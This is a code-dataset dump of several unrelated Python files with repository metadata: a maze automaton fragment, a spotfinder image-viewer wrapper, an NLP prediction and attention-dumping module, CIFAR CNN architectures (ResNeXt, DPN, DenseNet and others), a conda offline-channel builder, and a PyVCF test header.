Returns:
List of edges corresponding to primitive actions in the maze.
"""
primitives = []
for node_id, node_info in maze_graph.items():
for i, direction in enumerate(DIRECTION_ORDERING):
out_key = graph_types.OutEdgeType(f"{direction}_out")
if out_key in node_info.out_edges:
dest, = node_info.out_edges[out_key]
primitives.append((node_id, dest.node_id, i))
else:
primitives.append((node_id, node_id, i))
return primitives
SCHEMA = maze_schema.build_maze_schema(2)
# Backtracking doesn't make sense for maze environment.
BUILDER = automaton_builder.AutomatonBuilder(SCHEMA, with_backtrack=False)
PADDING_CONFIG = graph_bundle.PaddingConfig(
static_max_metadata=automaton_builder.EncodedGraphMetadata(
num_nodes=256, num_input_tagged_nodes=512),
max_initial_transitions=512,
max_in_tagged_transitions=2048,
max_edges=1024)
| 0 | 0 | 0 |
6279ab1a4ff19e5eafe90e482015ee5b59aa4654 | 1,252 | py | Python | spotfinder/applications/image_viewer.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 155 | 2016-11-23T12:52:16.000Z | 2022-03-31T15:35:44.000Z | spotfinder/applications/image_viewer.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 590 | 2016-12-10T11:31:18.000Z | 2022-03-30T23:10:09.000Z | spotfinder/applications/image_viewer.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 115 | 2016-11-15T08:17:28.000Z | 2022-02-09T15:30:14.000Z | from __future__ import absolute_import, division, print_function
from spotfinder.applications.wrappers import DistlOrganizer
"Later go back and refactor this module and signal_strength to avoid code duplication."
| 37.939394 | 92 | 0.729233 | from __future__ import absolute_import, division, print_function
from spotfinder.applications.wrappers import DistlOrganizer
class Empty: pass
"Later go back and refactor this module and signal_strength to avoid code duplication."
class run_signal_strength_class(DistlOrganizer):
def __init__(self,params):
E = Empty()
E.argv=['Empty']
E.argv.append(params.distl.image)
self.verbose = params.distl.verbose
if params.distl.res.inner!=None:
params.distl_lowres_limit = params.distl.res.inner
if params.distl.res.outer!=None:
params.force_method2_resolution_limit = params.distl.res.outer
params.distl_highres_limit = params.distl.res.outer
params.distl_force_binning = False
params.distl_permit_binning = False
params.wedgelimit = len(E.argv)
params.spotfinder_header_tests = False
DistlOrganizer.__init__(self,verbose = True, argument_module=E,
phil_params=params)
self.S = None # need to initialize determined by class SpotFrame
def view(self):
from rstbx.viewer.spotfinder_wrap import spot_wrapper
spot_wrapper(working_phil=self.phil_params).display(path = self.phil_params.distl.image,
organizer = self)
| 920 | 23 | 95 |
c4adb1ab10a5473e3829d2a1d242f1a18f0f49f3 | 3,608 | py | Python | predict/predictions.py | JohanObluda/ntua-slp-semeval2018 | c9c3ad2c05b4b4ea849dee0db13c3f02b52929b6 | [
"MIT"
] | 84 | 2018-05-25T08:26:38.000Z | 2021-12-23T06:15:08.000Z | predict/predictions.py | JohanObluda/ntua-slp-semeval2018 | c9c3ad2c05b4b4ea849dee0db13c3f02b52929b6 | [
"MIT"
] | 16 | 2018-06-06T15:09:45.000Z | 2022-01-15T09:17:14.000Z | predict/predictions.py | JohanObluda/ntua-slp-semeval2018 | c9c3ad2c05b4b4ea849dee0db13c3f02b52929b6 | [
"MIT"
] | 33 | 2018-06-05T18:13:29.000Z | 2022-02-04T00:54:12.000Z | import json
import os
import numpy
from torch.utils.data import DataLoader
from config import DEVICE, ATT_PATH
from logger.training import predict
from modules.nn.dataloading import WordDataset, CharDataset
from utils.nlp import twitter_preprocess
from utils.train import load_embeddings, get_pipeline
def predictions(task, model, config, data, label_transformer=None,
batch_size=128, preprocessor=None, name=None):
"""
Args:
task (): available tasks
- "clf": multiclass classification
- "bclf": binary classification
- "mclf": multilabel classification
- "reg": regression
model ():
config ():
data ():
label_transformer ():
batch_size ():
num_workers ():
Returns:
"""
word2idx = None
if config["op_mode"] == "word":
word2idx, idx2word, embeddings = load_embeddings(config)
# dummy scores if order to utilize Dataset classes as they are
dummy_y = [0] * len(data)
if config["op_mode"] == "word":
if preprocessor is None:
preprocessor = twitter_preprocess()
dataset = WordDataset(data, dummy_y, word2idx,
name=name,
preprocess=preprocessor,
label_transformer=label_transformer)
loader = DataLoader(dataset, batch_size)
elif config["op_mode"] == "char":
print("Building char-level datasets...")
dataset = CharDataset(data, dummy_y, name=name,
label_transformer=label_transformer)
loader = DataLoader(dataset, batch_size)
else:
raise ValueError("Invalid op_mode")
model.to(DEVICE)
pipeline = get_pipeline(task=task, eval=True)
avg_loss, (dummy_y, pred), posteriors, attentions = predict(model,
pipeline,
loader,
task,
"eval")
return pred, posteriors, attentions, loader.dataset.data
| 34.361905 | 79 | 0.509978 | import json
import os
import numpy
from torch.utils.data import DataLoader
from config import DEVICE, ATT_PATH
from logger.training import predict
from modules.nn.dataloading import WordDataset, CharDataset
from utils.nlp import twitter_preprocess
from utils.train import load_embeddings, get_pipeline
def dump_attentions(X, y, name, model, conf, task):
pred, posteriors, attentions, tokens = predictions(task, model, conf, X,
name=name)
data = []
for tweet, label, prediction, posterior, attention in zip(tokens, y,
pred, posteriors,
attentions):
if task == "mclf":
label = numpy.array(label)
prediction = numpy.array(prediction).astype(label.dtype)
item = {
"text": tweet,
"label": label.tolist(),
"prediction": prediction.tolist(),
"posterior": numpy.array(posterior).tolist(),
"attention": numpy.array(attention).tolist(),
}
elif task in ["clf", "bclf", "reg"]:
item = {
"text": tweet,
"label": label,
"prediction": type(label)(prediction),
"posterior": posterior,
"attention": attention,
}
else:
raise ValueError("Task not implemented!")
data.append(item)
with open(os.path.join(ATT_PATH, "{}.json".format(name)), 'w') as f:
json.dump(data, f, indent=4, separators=(',', ': '))
def predictions(task, model, config, data, label_transformer=None,
batch_size=128, preprocessor=None, name=None):
"""
Args:
task (): available tasks
- "clf": multiclass classification
- "bclf": binary classification
- "mclf": multilabel classification
- "reg": regression
model ():
config ():
data ():
label_transformer ():
batch_size ():
num_workers ():
Returns:
"""
word2idx = None
if config["op_mode"] == "word":
word2idx, idx2word, embeddings = load_embeddings(config)
# dummy scores if order to utilize Dataset classes as they are
dummy_y = [0] * len(data)
if config["op_mode"] == "word":
if preprocessor is None:
preprocessor = twitter_preprocess()
dataset = WordDataset(data, dummy_y, word2idx,
name=name,
preprocess=preprocessor,
label_transformer=label_transformer)
loader = DataLoader(dataset, batch_size)
elif config["op_mode"] == "char":
print("Building char-level datasets...")
dataset = CharDataset(data, dummy_y, name=name,
label_transformer=label_transformer)
loader = DataLoader(dataset, batch_size)
else:
raise ValueError("Invalid op_mode")
model.to(DEVICE)
pipeline = get_pipeline(task=task, eval=True)
avg_loss, (dummy_y, pred), posteriors, attentions = predict(model,
pipeline,
loader,
task,
"eval")
return pred, posteriors, attentions, loader.dataset.data
| 1,341 | 0 | 23 |
2cd61fe31658cc3071428c898c6644d5725bf290 | 18,647 | py | Python | src/models/cifar.py | kirk86/bdlood | 227aaf08585e467415c32235805c8fd17e7484ee | [
"MIT"
] | 1 | 2021-08-30T23:51:02.000Z | 2021-08-30T23:51:02.000Z | src/models/cifar.py | kirk86/bdlood | 227aaf08585e467415c32235805c8fd17e7484ee | [
"MIT"
] | null | null | null | src/models/cifar.py | kirk86/bdlood | 227aaf08585e467415c32235805c8fd17e7484ee | [
"MIT"
] | null | null | null | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
"""
modified to fit dataset size
"""
class ResNeXtBottleneck(nn.Module):
"""
RexNeXt bottleneck type C (https://github.com/facebookresearch/ResNeXt/blob/master/models/resnext.lua)
"""
def __init__(self, in_channels, out_channels, stride, cardinality,
base_width, widen_factor):
""" Constructor
Args:
in_channels: input channel dimensionality
out_channels: output channel dimensionality
stride: conv stride. Replaces pooling layer.
cardinality: num of convolution groups.
base_width: base number of channels in each group.
widen_factor: factor to reduce the input dimensionality
before convolution.
"""
super(ResNeXtBottleneck, self).__init__()
width_ratio = out_channels / (widen_factor * 64.)
D = cardinality * int(base_width * width_ratio)
self.conv_reduce = nn.Conv2d(in_channels, D, kernel_size=1,
stride=1, padding=0, bias=False)
self.bn_reduce = nn.BatchNorm2d(D)
self.conv_conv = nn.Conv2d(D, D, kernel_size=3, stride=stride,
padding=1, groups=cardinality, bias=False)
self.bn = nn.BatchNorm2d(D)
self.conv_expand = nn.Conv2d(D, out_channels, kernel_size=1,
stride=1, padding=0, bias=False)
self.bn_expand = nn.BatchNorm2d(out_channels)
self.shortcut = nn.Sequential()
if in_channels != out_channels:
self.shortcut.add_module('shortcut_conv',
nn.Conv2d(in_channels, out_channels,
kernel_size=1, stride=stride,
padding=0,
bias=False))
self.shortcut.add_module('shortcut_bn', nn.BatchNorm2d(out_channels))
class CifarResNeXt(nn.Module):
"""
ResNext optimized for the Cifar dataset, as specified in
https://arxiv.org/pdf/1611.05431.pdf
"""
def __init__(self, cardinality, depth, nlabels, base_width, widen_factor=4):
""" Constructor
Args:
cardinality: number of convolution groups.
depth: number of layers.
nlabels: number of classes
base_width: base number of channels in each group.
widen_factor: factor to adjust the channel dimensionality
"""
super(CifarResNeXt, self).__init__()
self.cardinality = cardinality
self.depth = depth
self.block_depth = (self.depth - 2) // 9
self.base_width = base_width
self.widen_factor = widen_factor
self.nlabels = nlabels
self.output_size = 64
self.stages = [64, 64 * self.widen_factor, 128 * self.widen_factor, 256 * self.widen_factor]
self.conv_1_3x3 = nn.Conv2d(3, 64, 3, 1, 1, bias=False)
self.bn_1 = nn.BatchNorm2d(64)
self.stage_1 = self.block('stage_1', self.stages[0], self.stages[1], 1)
self.stage_2 = self.block('stage_2', self.stages[1], self.stages[2], 2)
self.stage_3 = self.block('stage_3', self.stages[2], self.stages[3], 2)
self.classifier = nn.Linear(self.stages[3], nlabels)
nn.init.kaiming_normal(self.classifier.weight)
for key in self.state_dict():
if key.split('.')[-1] == 'weight':
if 'conv' in key:
nn.init.kaiming_normal(self.state_dict()[key], mode='fan_out')
if 'bn' in key:
self.state_dict()[key][...] = 1
elif key.split('.')[-1] == 'bias':
self.state_dict()[key][...] = 0
def block(self, name, in_channels, out_channels, pool_stride=2):
""" Stack n bottleneck modules where n is inferred from the depth of the network.
Args:
name: string name of the current block.
in_channels: number of input channels
out_channels: number of output channels
pool_stride: factor to reduce the spatial dimensionality in the first bottleneck of the block.
Returns: a Module consisting of n sequential bottlenecks.
"""
block = nn.Sequential()
for bottleneck in range(self.block_depth):
name_ = '%s_bottleneck_%d' % (name, bottleneck)
if bottleneck == 0:
block.add_module(name_, ResNeXtBottleneck(in_channels,
out_channels,
pool_stride,
self.cardinality,
self.base_width,
self.widen_factor))
else:
block.add_module(name_,
ResNeXtBottleneck(out_channels, out_channels,
1, self.cardinality,
self.base_width,
self.widen_factor))
return block
class Bottleneck(nn.Module):
'''Dual Path Networks in PyTorch.'''
# test()
| 37.071571 | 106 | 0.561055 | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
"""
modified to fit dataset size
"""
class ResNeXtBottleneck(nn.Module):
"""
RexNeXt bottleneck type C (https://github.com/facebookresearch/ResNeXt/blob/master/models/resnext.lua)
"""
def __init__(self, in_channels, out_channels, stride, cardinality,
base_width, widen_factor):
""" Constructor
Args:
in_channels: input channel dimensionality
out_channels: output channel dimensionality
stride: conv stride. Replaces pooling layer.
cardinality: num of convolution groups.
base_width: base number of channels in each group.
widen_factor: factor to reduce the input dimensionality
before convolution.
"""
super(ResNeXtBottleneck, self).__init__()
width_ratio = out_channels / (widen_factor * 64.)
D = cardinality * int(base_width * width_ratio)
self.conv_reduce = nn.Conv2d(in_channels, D, kernel_size=1,
stride=1, padding=0, bias=False)
self.bn_reduce = nn.BatchNorm2d(D)
self.conv_conv = nn.Conv2d(D, D, kernel_size=3, stride=stride,
padding=1, groups=cardinality, bias=False)
self.bn = nn.BatchNorm2d(D)
self.conv_expand = nn.Conv2d(D, out_channels, kernel_size=1,
stride=1, padding=0, bias=False)
self.bn_expand = nn.BatchNorm2d(out_channels)
self.shortcut = nn.Sequential()
if in_channels != out_channels:
self.shortcut.add_module('shortcut_conv',
nn.Conv2d(in_channels, out_channels,
kernel_size=1, stride=stride,
padding=0,
bias=False))
self.shortcut.add_module('shortcut_bn', nn.BatchNorm2d(out_channels))
def forward(self, x):
bottleneck = self.conv_reduce.forward(x)
bottleneck = F.relu(self.bn_reduce.forward(bottleneck), inplace=True)
bottleneck = self.conv_conv.forward(bottleneck)
bottleneck = F.relu(self.bn.forward(bottleneck), inplace=True)
bottleneck = self.conv_expand.forward(bottleneck)
bottleneck = self.bn_expand.forward(bottleneck)
residual = self.shortcut.forward(x)
return F.relu(residual + bottleneck, inplace=True)
class CifarResNeXt(nn.Module):
"""
ResNext optimized for the Cifar dataset, as specified in
https://arxiv.org/pdf/1611.05431.pdf
"""
def __init__(self, cardinality, depth, nlabels, base_width, widen_factor=4):
""" Constructor
Args:
cardinality: number of convolution groups.
depth: number of layers.
nlabels: number of classes
base_width: base number of channels in each group.
widen_factor: factor to adjust the channel dimensionality
"""
super(CifarResNeXt, self).__init__()
self.cardinality = cardinality
self.depth = depth
self.block_depth = (self.depth - 2) // 9
self.base_width = base_width
self.widen_factor = widen_factor
self.nlabels = nlabels
self.output_size = 64
self.stages = [64, 64 * self.widen_factor, 128 * self.widen_factor, 256 * self.widen_factor]
self.conv_1_3x3 = nn.Conv2d(3, 64, 3, 1, 1, bias=False)
self.bn_1 = nn.BatchNorm2d(64)
self.stage_1 = self.block('stage_1', self.stages[0], self.stages[1], 1)
self.stage_2 = self.block('stage_2', self.stages[1], self.stages[2], 2)
self.stage_3 = self.block('stage_3', self.stages[2], self.stages[3], 2)
self.classifier = nn.Linear(self.stages[3], nlabels)
nn.init.kaiming_normal(self.classifier.weight)
for key in self.state_dict():
if key.split('.')[-1] == 'weight':
if 'conv' in key:
nn.init.kaiming_normal(self.state_dict()[key], mode='fan_out')
if 'bn' in key:
self.state_dict()[key][...] = 1
elif key.split('.')[-1] == 'bias':
self.state_dict()[key][...] = 0
def block(self, name, in_channels, out_channels, pool_stride=2):
""" Stack n bottleneck modules where n is inferred from the depth of the network.
Args:
name: string name of the current block.
in_channels: number of input channels
out_channels: number of output channels
pool_stride: factor to reduce the spatial dimensionality in the first bottleneck of the block.
Returns: a Module consisting of n sequential bottlenecks.
"""
block = nn.Sequential()
for bottleneck in range(self.block_depth):
name_ = '%s_bottleneck_%d' % (name, bottleneck)
if bottleneck == 0:
block.add_module(name_, ResNeXtBottleneck(in_channels,
out_channels,
pool_stride,
self.cardinality,
self.base_width,
self.widen_factor))
else:
block.add_module(name_,
ResNeXtBottleneck(out_channels, out_channels,
1, self.cardinality,
self.base_width,
self.widen_factor))
return block
def forward(self, x):
x = self.conv_1_3x3.forward(x)
x = F.relu(self.bn_1.forward(x), inplace=True)
x = self.stage_1.forward(x)
x = self.stage_2.forward(x)
x = self.stage_3.forward(x)
x = F.avg_pool2d(x, 8, 1)
x = x.view(-1, self.stages[3])
return self.classifier(x)
class Bottleneck(nn.Module):
'''Dual Path Networks in PyTorch.'''
def __init__(self, last_planes, in_planes, out_planes, dense_depth,
stride, first_layer):
super(Bottleneck, self).__init__()
self.out_planes = out_planes
self.dense_depth = dense_depth
self.conv1 = nn.Conv2d(last_planes, in_planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv2 = nn.Conv2d(in_planes, in_planes, kernel_size=3, stride=stride,
padding=1, groups=32, bias=False)
self.bn2 = nn.BatchNorm2d(in_planes)
self.conv3 = nn.Conv2d(in_planes, out_planes+dense_depth, kernel_size=1,
bias=False)
self.bn3 = nn.BatchNorm2d(out_planes+dense_depth)
self.shortcut = nn.Sequential()
if first_layer:
self.shortcut = nn.Sequential(
nn.Conv2d(last_planes, out_planes+dense_depth, kernel_size=1,
stride=stride, bias=False),
nn.BatchNorm2d(out_planes+dense_depth)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
x = self.shortcut(x)
d = self.out_planes
out = torch.cat([x[:, :d, :, :] + out[:, :d, :, :],
x[:, d:, :, :],
out[:, d:, :, :]], dim=1)
out = F.relu(out)
return out
class DPN(nn.Module):
def __init__(self, cfg):
super(DPN, self).__init__()
in_planes, out_planes = cfg['in_planes'], cfg['out_planes']
num_blocks, dense_depth = cfg['num_blocks'], cfg['dense_depth']
self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.last_planes = 64
self.layer1 = self._make_layer(in_planes[0], out_planes[0],
num_blocks[0], dense_depth[0], stride=1)
self.layer2 = self._make_layer(in_planes[1], out_planes[1],
num_blocks[1], dense_depth[1], stride=2)
self.layer3 = self._make_layer(in_planes[2], out_planes[2],
num_blocks[2], dense_depth[2], stride=2)
self.layer4 = self._make_layer(in_planes[3], out_planes[3],
num_blocks[3], dense_depth[3], stride=2)
self.linear = nn.Linear(
out_planes[3] + (num_blocks[3] + 1) * dense_depth[3], 10)
def _make_layer(self, in_planes, out_planes, num_blocks, dense_depth, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for i,stride in enumerate(strides):
layers.append(Bottleneck(self.last_planes, in_planes,
out_planes, dense_depth, stride, i == 0))
self.last_planes = out_planes + (i+2) * dense_depth
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
class LeNet(nn.Module):
def __init__(self, num_classes=10):
super(LeNet, self).__init__()
self.conv1 = nn.Conv2d(3, 6, kernel_size=5)
self.conv2 = nn.Conv2d(6, 16, kernel_size=5)
self.fc1 = nn.Linear(16*5*5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, num_classes)
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.max_pool2d(x, 2)
x = F.relu(self.conv2(x))
x = F.max_pool2d(x, 2)
x = x.view(x.size(0), -1)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
class AlexNet(nn.Module):
def __init__(self, num_classes=10):
super(AlexNet, self).__init__()
self.features = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=5, stride=4, padding=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(64, 192, kernel_size=3, padding=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(192, 384, kernel_size=3, stride=2, padding=3),
nn.ReLU(inplace=True),
nn.Conv2d(384, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=3, stride=2),
)
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(256 * 2 * 2, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Linear(4096, num_classes),
)
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), 256 * 2 * 2)
x = self.classifier(x)
return x
class Inception(nn.Module):
def __init__(self, in_planes, kernel_1_x, kernel_3_in, kernel_3_x,
kernel_5_in, kernel_5_x, pool_planes):
super(Inception, self).__init__()
# 1x1 conv branch
self.b1 = nn.Sequential(
nn.Conv2d(in_planes, kernel_1_x, kernel_size=1),
nn.BatchNorm2d(kernel_1_x),
nn.ReLU(True),
)
# 1x1 conv -> 3x3 conv branch
self.b2 = nn.Sequential(
nn.Conv2d(in_planes, kernel_3_in, kernel_size=1),
nn.BatchNorm2d(kernel_3_in),
nn.ReLU(True),
nn.Conv2d(kernel_3_in, kernel_3_x, kernel_size=3, padding=1),
nn.BatchNorm2d(kernel_3_x),
nn.ReLU(True),
)
# 1x1 conv -> 5x5 conv branch
self.b3 = nn.Sequential(
nn.Conv2d(in_planes, kernel_5_in, kernel_size=1),
nn.BatchNorm2d(kernel_5_in),
nn.ReLU(True),
nn.Conv2d(kernel_5_in, kernel_5_x, kernel_size=3, padding=1),
nn.BatchNorm2d(kernel_5_x),
nn.ReLU(True),
nn.Conv2d(kernel_5_x, kernel_5_x, kernel_size=3, padding=1),
nn.BatchNorm2d(kernel_5_x),
nn.ReLU(True),
)
# 3x3 pool -> 1x1 conv branch
self.b4 = nn.Sequential(
nn.MaxPool2d(3, stride=1, padding=1),
nn.Conv2d(in_planes, pool_planes, kernel_size=1),
nn.BatchNorm2d(pool_planes),
nn.ReLU(True),
)
def forward(self, x):
y1 = self.b1(x)
y2 = self.b2(x)
y3 = self.b3(x)
y4 = self.b4(x)
return torch.cat([y1, y2, y3, y4], 1)
class GoogLeNet(nn.Module):
def __init__(self, num_classes=10):
super(GoogLeNet, self).__init__()
self.pre_layers = nn.Sequential(
nn.Conv2d(3, 192, kernel_size=3, padding=1),
nn.BatchNorm2d(192),
nn.ReLU(True),
)
self.a3 = Inception(192, 64, 96, 128, 16, 32, 32)
self.b3 = Inception(256, 128, 128, 192, 32, 96, 64)
self.max_pool = nn.MaxPool2d(3, stride=2, padding=1)
self.a4 = Inception(480, 192, 96, 208, 16, 48, 64)
self.b4 = Inception(512, 160, 112, 224, 24, 64, 64)
self.c4 = Inception(512, 128, 128, 256, 24, 64, 64)
self.d4 = Inception(512, 112, 144, 288, 32, 64, 64)
self.e4 = Inception(528, 256, 160, 320, 32, 128, 128)
self.a5 = Inception(832, 256, 160, 320, 32, 128, 128)
self.b5 = Inception(832, 384, 192, 384, 48, 128, 128)
self.avgpool = nn.AvgPool2d(8, stride=1)
self.linear = nn.Linear(1024, num_classes)
def forward(self, x):
x = self.pre_layers(x)
x = self.a3(x)
x = self.b3(x)
x = self.max_pool(x)
x = self.a4(x)
x = self.b4(x)
x = self.c4(x)
x = self.d4(x)
x = self.e4(x)
x = self.max_pool(x)
x = self.a5(x)
x = self.b5(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.linear(x)
return x
class DenseBottleneck(nn.Module):
def __init__(self, in_planes, growth_rate):
super(DenseBottleneck, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, 4 * growth_rate, kernel_size=1, bias=False)
self.bn2 = nn.BatchNorm2d(4 * growth_rate)
self.conv2 = nn.Conv2d(4 * growth_rate, growth_rate, kernel_size=3,
padding=1, bias=False)
def forward(self, x):
y = self.conv1(F.relu(self.bn1(x)))
y = self.conv2(F.relu(self.bn2(y)))
x = torch.cat([y, x], 1)
return x
class Transition(nn.Module):
def __init__(self, in_planes, out_planes):
super(Transition, self).__init__()
self.bn = nn.BatchNorm2d(in_planes)
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=1, bias=False)
def forward(self, x):
x = self.conv(F.relu(self.bn(x)))
x = F.avg_pool2d(x, 2)
return x
class DenseNet(nn.Module):
def __init__(self, block, num_block, growth_rate=12, reduction=0.5,
num_classes=10):
super(DenseNet, self).__init__()
self.growth_rate = growth_rate
num_planes = 2 * growth_rate
self.conv1 = nn.Conv2d(3, num_planes, kernel_size=3, padding=1, bias=False)
self.dense1 = self._make_dense_layers(block, num_planes, num_block[0])
num_planes += num_block[0] * growth_rate
out_planes = int(math.floor(num_planes * reduction))
self.trans1 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense2 = self._make_dense_layers(block, num_planes, num_block[1])
num_planes += num_block[1] * growth_rate
out_planes = int(math.floor(num_planes * reduction))
self.trans2 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense3 = self._make_dense_layers(block, num_planes, num_block[2])
num_planes += num_block[2] * growth_rate
out_planes = int(math.floor(num_planes * reduction))
self.trans3 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense4 = self._make_dense_layers(block, num_planes, num_block[3])
num_planes += num_block[3] * growth_rate
self.bn = nn.BatchNorm2d(num_planes)
self.linear = nn.Linear(num_planes, num_classes)
def _make_dense_layers(self, block, in_planes, num_block):
layers = []
for i in range(num_block):
layers.append(block(in_planes, self.growth_rate))
in_planes += self.growth_rate
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.trans1(self.dense1(x))
x = self.trans2(self.dense2(x))
x = self.trans3(self.dense3(x))
x = self.dense4(x)
x = F.avg_pool2d(F.relu(self.bn(x)), 4)
x = x.view(x.size(0), -1)
x = self.linear(x)
return x
def DenseNet121():
return DenseNet(DenseBottleneck, [6, 12, 24, 16], growth_rate=32)
def DenseNet169():
return DenseNet(DenseBottleneck, [6, 12, 32, 32], growth_rate=32)
def DenseNet201():
return DenseNet(DenseBottleneck, [6, 12, 48, 32], growth_rate=32)
def DenseNet161():
return DenseNet(DenseBottleneck, [6, 12, 36, 24], growth_rate=48)
def resnext29_cifar10():
return CifarResNeXt(cardinality=32, depth=4, nlabels=10,
base_width=29)
def densenet_cifar(num_classes=10):
return DenseNet(DenseBottleneck, [6, 12, 24, 16], growth_rate=12)
def DPN26():
cfg = {
'in_planes': (96, 192, 384, 768),
'out_planes': (256, 512, 1024, 2048),
'num_blocks': (2, 2, 2, 2),
'dense_depth': (16, 32, 24, 128)
}
return DPN(cfg)
def DPN92(num_classes=10):
cfg = {
'in_planes': (96, 192, 384, 768),
'out_planes': (256, 512, 1024, 2048),
'num_blocks': (3, 4, 20, 3),
'dense_depth': (16, 32, 24, 128)
}
return DPN(cfg)
def test():
net = DPN92()
x = torch.randn(1, 3, 32, 32)
y = net(x)
print(y)
# test()
| 12,199 | 42 | 976 |
147be1c987270e7071f33f0664b66e49c7c1a99d | 3,460 | py | Python | offline/channel.py | wrh-dev/conda-offline | 9f6088b1d14d90caf74a170e8448ca7c982a67ef | [
"MIT"
] | null | null | null | offline/channel.py | wrh-dev/conda-offline | 9f6088b1d14d90caf74a170e8448ca7c982a67ef | [
"MIT"
] | null | null | null | offline/channel.py | wrh-dev/conda-offline | 9f6088b1d14d90caf74a170e8448ca7c982a67ef | [
"MIT"
] | null | null | null | import argparse
import logging
import os
import platform
import shutil
import subprocess
logging.getLogger(__name__).addHandler(logging.NullHandler())
if __name__ == '__main__':
_main_cmdline()
| 37.204301 | 99 | 0.69711 | import argparse
import logging
import os
import platform
import shutil
import subprocess
logging.getLogger(__name__).addHandler(logging.NullHandler())
def iter_package_dir(path: str):
for filename in os.listdir(path):
if filename.endswith('.tar.bz2'):
yield filename
def copy_and_index_files(packages_path: str, channel_path: str, is_64_bit: bool):
if is_64_bit and platform.system() == 'Windows':
arch_sub_folder = 'win-64'
elif not is_64_bit and platform.system() == 'Windows':
arch_sub_folder = 'win-32'
elif is_64_bit and platform.system() == 'Linux':
arch_sub_folder = 'linux-64'
elif not is_64_bit and platform.system() == 'Linux':
arch_sub_folder = 'linux-32'
elif is_64_bit and platform.system() == 'Darwin':
arch_sub_folder = 'osx-64'
else:
err_string = 'Unrecognized or incompatible architecture for conda'
logging.error(err_string)
raise ValueError(err_string)
logging.debug('Detected architecture as {0:s}'.format(arch_sub_folder))
arch_folder = os.path.join(channel_path, arch_sub_folder)
os.makedirs(arch_folder)
logging.info('Copying packages from {0:s} to {1:s}'.format(packages_path, arch_folder))
for package_file in iter_package_dir(packages_path):
copied_name = shutil.copy(os.path.join(packages_path, package_file), arch_folder)
logging.debug('Finished copying package to {0:s}'.format(copied_name))
subprocess.run(['conda', 'index', channel_path])
def create_offline_channel(packages_path: str, channel_path: str, is_64_bit: bool):
# 1. Create the channel directory if it does not exist
if os.path.exists(channel_path):
if os.listdir(channel_path):
err_string = 'The channel path must be an empty or non-existent folder'
logging.error(err_string)
raise ValueError(err_string)
else:
logging.debug('Creating channel path directory {0:s}'.format(channel_path))
os.makedirs(channel_path)
# 2. Copy the packages to the channel path and index the packages
copy_and_index_files(packages_path, channel_path, is_64_bit)
logging.info('Done creating channel')
def _argparse_packages_folder(filename: str):
if not os.path.exists(filename):
raise argparse.ArgumentTypeError('Package path {0:s} does not exist'.format(filename))
return os.path.realpath(filename)
def _argparse_channel_folder(filename: str):
if os.path.exists(filename):
if os.listdir(filename):
raise argparse.ArgumentTypeError(
'Channel path {0:s} must be an empty or non-existent folder'.format(filename))
return os.path.realpath(filename)
def _main_cmdline():
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(description='Create an offline channel from a package folder')
parser.add_argument('packages_folder', type=_argparse_packages_folder,
help='file path to packages folder')
parser.add_argument('channel_folder', type=_argparse_channel_folder,
help='file path to channel folder')
parser.add_argument('--arch', choices={32, 64}, default=64,
help='architecture (default to 64)')
args = parser.parse_args()
create_offline_channel(args.packages_folder, args.channel_folder, args.arch == 64)
if __name__ == '__main__':
_main_cmdline()
| 3,114 | 0 | 138 |
c3a2e2f54e8af90178fcb6c54fa3c64f500167cd | 32,123 | py | Python | vcf/test/test_vcf.py | jdiez/PyVCF | cd30d62e6fa3c9a44ed711adf0d22af3a4e4a5a1 | [
"MIT"
] | 1 | 2015-11-23T01:23:00.000Z | 2015-11-23T01:23:00.000Z | vcf/test/test_vcf.py | jdiez/PyVCF | cd30d62e6fa3c9a44ed711adf0d22af3a4e4a5a1 | [
"MIT"
] | null | null | null | vcf/test/test_vcf.py | jdiez/PyVCF | cd30d62e6fa3c9a44ed711adf0d22af3a4e4a5a1 | [
"MIT"
] | null | null | null | from __future__ import print_function
import unittest
import doctest
import os
import commands
import cPickle
from StringIO import StringIO
import vcf
from vcf import utils
suite = doctest.DocTestSuite(vcf)
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestGatkOutput))
